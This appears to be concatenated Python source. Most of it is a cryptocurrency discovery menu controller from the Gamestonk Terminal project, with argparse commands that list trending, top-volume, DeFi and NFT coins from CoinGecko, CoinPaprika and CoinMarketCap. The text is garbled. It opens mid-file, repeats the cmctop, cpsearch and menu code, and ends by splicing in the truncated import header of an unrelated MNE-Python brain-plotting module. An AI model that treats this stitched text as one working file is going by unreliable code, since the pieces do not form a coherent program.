export=ns_parser.export, links=ns_parser.urls, ) @try_except def call_cmctop(self, other_args): """Process cmctop command""" parser = argparse.ArgumentParser( prog="cmctop", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="This gets the top ranked coins from coinmarketcap.com", ) parser.add_argument( "-l", "--limit", default=15, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="column to sort data by.", default="CMC_Rank", choices=coinmarketcap_model.FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: coinmarketcap_view.display_cmc_top_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cpsearch(self, other_args): """Process search command""" parser = argparse.ArgumentParser( add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, prog="cpsearch", description="""Search over CoinPaprika API You can display only N number of results with --limit parameter. You can sort data by id, name , category --sort parameter and also with --descend flag to sort descending. To choose category in which you are searching for use --cat/-c parameter. Available categories: currencies|exchanges|icos|people|tags|all Displays: id, name, category""", ) parser.add_argument( "-q", "--query", help="phrase for search", dest="query", nargs="+", type=str, required="-h" not in other_args, ) parser.add_argument( "-c", "--cat", help="Categories to search: currencies|exchanges|icos|people|tags|all. Default: all", dest="category", default="all", type=str, choices=coinpaprika_model.CATEGORIES, ) parser.add_argument( "-l", "--limit", default=10, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: id", default="id", choices=coinpaprika_model.FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) if other_args: if not other_args[0][0] == "-": other_args.insert(0, "-q") ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: coinpaprika_view.display_search_results( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, query=" ".join(ns_parser.query), category=ns_parser.category, ) def menu(queue: List[str] = None): """Discovery Menu""" disc_controller = DiscoveryController(queue=queue) an_input = "HELP_ME" while True: # There is a command in the queue if disc_controller.queue and len(disc_controller.queue) > 0: # If the command is quitting the menu we want to return in here if disc_controller.queue[0] in ("q", "..", "quit"): if len(disc_controller.queue) > 1: return disc_controller.queue[1:] return [] # Consume 1 element from the queue an_input = disc_controller.queue[0] disc_controller.queue = disc_controller.queue[1:] # Print the current location because this was an instruction and we want user to know what was the action if an_input and an_input.split(" ")[0] in disc_controller.CHOICES_COMMANDS: print(f"{get_flair()} /crypto/disc/ $ {an_input}") # Get input command from user else: # Display help menu when entering on this menu from a level above if an_input == "HELP_ME": disc_controller.print_help() # Get input from user using auto-completion if session and gtff.USE_PROMPT_TOOLKIT and disc_controller.completer: try: an_input = session.prompt( f"{get_flair()} /crypto/disc/ $ ", completer=disc_controller.completer, search_ignore_case=True, ) except KeyboardInterrupt: # Exit in case of keyboard interrupt an_input = "exit" # Get input from user without auto-completion else: an_input = input(f"{get_flair()} /crypto/disc/ $ ") try: # Process the input command disc_controller.queue = disc_controller.switch(an_input) except SystemExit: print( f"\nThe command '{an_input}' doesn't exist on the /stocks/options menu.", end="", ) similar_cmd = difflib.get_close_matches( an_input.split(" ")[0] if " " in an_input else an_input, disc_controller.CHOICES, n=1, cutoff=0.7, ) if similar_cmd: if " " in an_input: candidate_input = ( f"{similar_cmd[0]} {" ".join(an_input.split(" ")[1:])}" ) if candidate_input == an_input: an_input = "" disc_controller.queue = [] print("\n") continue an_input = candidate_input else: an_input = similar_cmd[0] print(f" Replacing by '{an_input}'.") disc_controller.queue.insert(0, an_input) else: print("\n")
"""Cryptocurrency Discovery Controller""" __docformat__ = "numpy" # pylint: disable=R0904, C0302, W0622, C0201 import argparse import difflib from typing import List, Union from prompt_toolkit.completion import NestedCompleter from gamestonk_terminal import feature_flags as gtff from gamestonk_terminal.helper_funcs import ( EXPORT_ONLY_RAW_DATA_ALLOWED, get_flair, parse_known_args_and_warn, check_positive, try_except, system_clear, ) from gamestonk_terminal.menu import session from gamestonk_terminal.cryptocurrency.discovery import ( coinmarketcap_model, coinpaprika_model, pycoingecko_model, pycoingecko_view, coinpaprika_view, coinmarketcap_view, ) from gamestonk_terminal.cryptocurrency.crypto_controller import CRYPTO_SOURCES from gamestonk_terminal.cryptocurrency import cryptocurrency_helpers class DiscoveryController: """Discovery Controller class""" CHOICES = [ "cls", "home", "h", "?", "help", "q", "quit", "..", "exit", "r", "reset", ] CHOICES_COMMANDS = [ "coins", "cpsearch", "cmctop", "cgtrending", "cgvoted", "cgvisited", "cgvolume", "cgrecently", "cgsentiment", "cggainers", "cglosers", "cgyfarms", "cgdefi", "cgdex", "cgnft", ] CHOICES += CHOICES_COMMANDS def __init__(self, queue: List[str] = None): """CONSTRUCTOR""" self.discovery_parser = argparse.ArgumentParser(add_help=False, prog="disc") self.discovery_parser.add_argument("cmd", choices=self.CHOICES) self.completer: Union[None, NestedCompleter] = None if session and gtff.USE_PROMPT_TOOLKIT: choices: dict = {c: {} for c in self.CHOICES} choices["coins"]["--source"] = {c: {} for c in CRYPTO_SOURCES.keys()} choices["cggainers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cggainers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cglosers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cglosers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cgtrending"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvoted"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvisited"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgsentiment"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgrecently"]["-s"] = { c: {} for c in pycoingecko_model.RECENTLY_FILTERS } choices["cgyfarms"]["-s"] = { c: {} for c in pycoingecko_model.YFARMS_FILTERS } choices["cgvolume"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdefi"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgnft"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdex"]["-s"] = {c: {} for c in pycoingecko_model.DEX_FILTERS} choices["cmctop"]["-s"] = {c: {} for c in coinmarketcap_model.FILTERS} choices["cpsearch"]["-s"] = {c: {} for c in coinpaprika_model.FILTERS} choices["cpsearch"]["-c"] = {c: {} for c in coinpaprika_model.CATEGORIES} self.completer = NestedCompleter.from_nested_dict(choices) if queue: self.queue = queue else: self.queue = list() def print_help(self): """Print help""" help_text = """ Discovery Menu: Overview: coins search for coins on CoinGecko, Binance, CoinPaprika CoinGecko: cgtrending trending coins on CoinGecko cgvoted most voted coins on CoinGecko cgvisited most visited coins on CoinGecko cgvolume coins with highest volume on CoinGecko cgrecently recently added on CoinGecko cgsentiment coins with most positive sentiment cggainers top gainers - coins which price gained the most in given period cglosers top losers - coins which price dropped the most in given period cgyfarms top yield farms cgdefi top defi protocols cgdex top decentralized exchanges cgnft top non fungible tokens CoinPaprika: cpsearch search on CoinPaprika CoinMarketCap: cmctop top coins from CoinMarketCap """ print(help_text) def switch(self, an_input: str): """Process and dispatch input Parameters ------- an_input : str string with input arguments Returns ------- List[str] List of commands in the queue to execute """ # Empty command if not an_input: print("") return self.queue # Navigation slash is being used if "/" in an_input: actions = an_input.split("/") # Absolute path is specified if not actions[0]: an_input = "home" # Relative path so execute first instruction else: an_input = actions[0] # Add all instructions to the queue for cmd in actions[1:][::-1]: if cmd: self.queue.insert(0, cmd) (known_args, other_args) = self.discovery_parser.parse_known_args( an_input.split() ) # Redirect commands to their correct functions if known_args.cmd: if known_args.cmd in ("..", "q"): known_args.cmd = "quit" elif known_args.cmd in ("?", "h"): known_args.cmd = "help" elif known_args.cmd == "r": known_args.cmd = "reset" getattr( self, "call_" + known_args.cmd, lambda _: "Command not recognized!", )(other_args) return self.queue def call_cls(self, _): """Process cls command""" system_clear() def call_home(self, _): """Process home command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_help(self, _): """Process help command""" self.print_help() def call_quit(self, _): """Process quit menu command""" print("") self.queue.insert(0, "quit") def call_exit(self, _): """Process exit terminal command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_reset(self, _): """Process reset command""" self.queue.insert(0, "disc") self.queue.insert(0, "crypto") self.queue.insert(0, "reset") self.queue.insert(0, "quit") self.queue.insert(0, "quit") @try_except def call_coins(self, other_args): """Process coins command""" parser = argparse.ArgumentParser( prog="coins", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows list of coins available on CoinGecko, CoinPaprika and Binance.If you provide name of coin then in result you will see ids of coins with best match for all mentioned services. If you provide ALL keyword in your search query, then all coins will be displayed. To move over coins you can use pagination mechanism with skip, top params. E.g. coins ALL --skip 100 --limit 30 then all coins from 100 to 130 will be displayed. By default skip = 0, limit = 10. If you won't provide source of the data everything will be displayed (CoinGecko, CoinPaprika, Binance). If you want to search only in given source then use --source flag. E.g. if you want to find coin with name uniswap on CoinPaprika then use: coins uniswap --source cp --limit 10 """, ) parser.add_argument( "-c", "--coin", help="Coin you search for", dest="coin", required="-h" not in other_args, type=str, ) parser.add_argument( "-s", "--skip", default=0, dest="skip", help="Skip n of records", type=check_positive, ) parser.add_argument( "-l", "--limit", default=10, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "--source", dest="source", help="Source of data.", type=str, choices=CRYPTO_SOURCES.keys(), ) if other_args: if not other_args[0][0] == "-": other_args.insert(0, "-c") ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: cryptocurrency_helpers.display_all_coins( coin=ns_parser.coin, source=ns_parser.source, top=ns_parser.limit, skip=ns_parser.skip, show_all=bool("ALL" in other_args), export=ns_parser.export, ) @try_except def call_cggainers(self, other_args): """Process gainers command""" parser = argparse.ArgumentParser( prog="cggainers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Gainers - coins which gain the most in given period. You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to set it to sort descending. There is --urls flag, which will display one additional column you all urls for coins. """, ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_gainers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cglosers(self, other_args): """Process losers command""" parser = argparse.ArgumentParser( prog="cglosers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Losers - coins which price dropped the most in given period You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. """, ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_losers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgtrending(self, other_args): """Process trending command""" parser = argparse.ArgumentParser( prog="cgtrending", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover trending coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. trending will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="trending", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvoted(self, other_args): """Process voted command""" parser = argparse.ArgumentParser( prog="cgvoted", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover most voted coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. voted will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_voted", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgrecently(self, other_args): """Process recently command""" parser = argparse.ArgumentParser( prog="cgrecently", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows recently added coins on CoinGecko. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Added with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.RECENTLY_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_recently_added( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvisited(self, other_args): """Process most_visited command""" parser = argparse.ArgumentParser( prog="cgvisited", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover most visited coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. visited will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_visited", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgsentiment(self, other_args): """Process sentiment command""" parser = argparse.ArgumentParser( prog="cgsentiment", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover coins with positive sentiment. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. sentiment will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="positive_sentiment", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgyfarms(self, other_args): """Process yfarms command""" parser = argparse.ArgumentParser( prog="cgyfarms", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Top Yield Farming Pools by Value Locked. Yield farming, also referred to as liquidity mining, is a way to generate rewards with cryptocurrency holdings. In simple terms, it means locking up cryptocurrencies and getting rewards. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Value_Locked, Return_Year with --sort parameter and also with --descend flag to sort descending. """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.YFARMS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_yieldfarms( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgvolume(self, other_args): """Process volume command""" parser = argparse.ArgumentParser( prog="cgvolume", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top Coins by Trading Volume. You can display only N number of coins with --limit parameter. You can sort data by on of columns Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap with --sort parameter and also with --descend flag to sort descending. Displays columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_volume_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgdefi(self, other_args): """Process defi command""" parser = argparse.ArgumentParser( prog="cgdefi", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top DeFi Coins by Market Capitalization DeFi or Decentralized Finance refers to financial services that are built on top of distributed networks with no central intermediaries. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume 24h, Market Cap, Url with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_defi_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgdex(self, other_args): """Process dex command""" parser = argparse.ArgumentParser( prog="cgdex", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Top Decentralized Exchanges on CoinGecko by Trading Volume You can display only N number of coins with --limit parameter. You can sort data by Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share by volume with --sort and also with --descend flag to sort descending. Display columns: Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.DEX_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_dex( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgnft(self, other_args): """Process nft command""" parser = argparse.ArgumentParser( prog="cgnft", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top NFT Coins by Market Capitalization NFT (Non-fungible Token) refers to digital assets with unique characteristics. Examples of NFT include crypto artwork, collectibles, game items, financial products, and more. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap with --sort and also with --descend flag to sort descending. Flag --urls will display urls Displays : Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap, Url""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_nft( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, links=ns_parser.urls, ) @try_except def call_cmctop(self, other_args): """Process cmctop command""" parser = argparse.ArgumentParser( prog="cmctop", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="This gets the top ranked coins from coinmarketcap.com", ) parser.add_argument( "-l", "--limit", default=15, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="column to sort data by.", default="CMC_Rank", choices=coinmarketcap_model.FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: coinmarketcap_view.display_cmc_top_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cpsearch(self, other_args): """Process search command""" parser = argparse.ArgumentParser( add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, prog="cpsearch", description="""Search over CoinPaprika API You can display only N number of results with --limit parameter. You can sort data by id, name , category --sort parameter and also with --descend flag to sort descending. To choose category in which you are searching for use --cat/-c parameter. Available categories: currencies|exchanges|icos|people|tags|all Displays: id, name, category""", ) parser.add_argument( "-q", "--query", help="phrase for search", dest="query", nargs="+", type=str, required="-h" not in other_args, ) parser.add_argument( "-c", "--cat", help="Categories to search: currencies|exchanges|icos|people|tags|all. Default: all", dest="category", default="all", type=str, choices=coinpaprika_model.CATEGORIES, ) parser.add_argument( "-l", "--limit", default=10, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: id", default="id", choices=coinpaprika_model.FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) if other_args: if not other_args[0][0] == "-": other_args.insert(0, "-q") ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: coinpaprika_view.display_search_results( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, query=" ".join(ns_parser.query), category=ns_parser.category, ) def menu(queue: List[str] = None): """Discovery Menu""" disc_controller = DiscoveryController(queue=queue) an_input = "HELP_ME" while True: # There is a command in the queue if disc_controller.queue and len(disc_controller.queue) > 0: # If the command is quitting the menu we want to return in here if disc_controller.queue[0] in ("q", "..", "quit"): if len(disc_controller.queue) > 1: return disc_controller.queue[1:] return [] # Consume 1 element from the queue an_input = disc_controller.queue[0] disc_controller.queue = disc_controller.queue[1:] # Print the current location because this was an instruction and we want user to know what was the action if an_input and an_input.split(" ")[0] in disc_controller.CHOICES_COMMANDS: print(f"{get_flair()} /crypto/disc/ $ {an_input}") # Get input command from user else: # Display help menu when entering on this menu from a level above if an_input == "HELP_ME": disc_controller.print_help() # Get input from user using auto-completion if session and gtff.USE_PROMPT_TOOLKIT and disc_controller.completer: try: an_input = session.prompt( f"{get_flair()} /crypto/disc/ $ ", completer=disc_controller.completer, search_ignore_case=True, ) except KeyboardInterrupt: # Exit in case of keyboard interrupt an_input = "exit" # Get input from user without auto-completion else: an_input = input(f"{get_flair()} /crypto/disc/ $ ") try: # Process the input command disc_controller.queue = disc_controller.switch(an_input) except SystemExit: print( f"\nThe command '{an_input}' doesn't exist on the /stocks/options menu.", end="", ) similar_cmd = difflib.get_close_matches( an_input.split(" ")[0] if " " in an_input else an_input, disc_controller.CHOICES, n=1, cutoff=0.7, ) if similar_cmd: if " " in an_input: candidate_input = ( f"{similar_cmd[0]} {' '.join(an_input.split(' ')[1:])}" ) if candidate_input == an_input: an_input = "" disc_controller.queue = [] print("\n") continue an_input = candidate_input else: an_input = similar_cmd[0] print(f" Replacing by '{an_input}'.") disc_controller.queue.insert(0, an_input) else: print("\n")
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Eric Larson <larson.eric.d@gmail.com> # Oleh Kozynets <ok7mailbox@gmail.com> # Guillaume Favelier <guillaume.favelier@gmail.com> # jona-sassenhagen <jona.sassenhagen@gmail.com> # Joan Massich <mailsik@gmail.com> # # License: Simplified BSD import contextlib from functools import partial from io import BytesIO import os import os.path as op import time import copy import traceback import warnings import numpy as np from collections import OrderedDict from .colormap import calculate_lut from .surface import _Surface from .view import views_dicts, _lh_views_dict from .callback import (ShowView, TimeCallBack, SmartCallBack, UpdateLUT, UpdateColorbarScale) from ..utils import (_show_help_fig, _get_color_list, concatenate_images, _generate_default_filename, _save_ndarray_img, safe_event) from .._3d import (_process_clim, _handle_time, _check_views, _handle_sensor_types, _plot_sensors, _plot_forward) from ...defaults import _handle_default, DEFAULTS from ...fixes import _point_data, _cell_data from ..._freesurfer import (vertex_to_mni, read_talxfm, read_freesurfer_lut, _get_head_surface, _get_skull_surface) from ...io.pick import pick_types from ...io.meas_info import Info from ...surface import (mesh_edges, _mesh_borders, _marching_cubes, get_meg_helmet_surf) from ...source_space import SourceSpaces from ...transforms import (Transform, apply_trans, invert_transform, _get_trans, _get_transforms_to_coord_frame, _frame_to_str) from ...utils import (_check_option, logger, verbose, fill_doc, _validate_type, use_log_level, Bunch, _ReuseCycle, warn, deprecated, get_subjects_dir, _check_fname, _to_rgb) _ARROW_MOVE 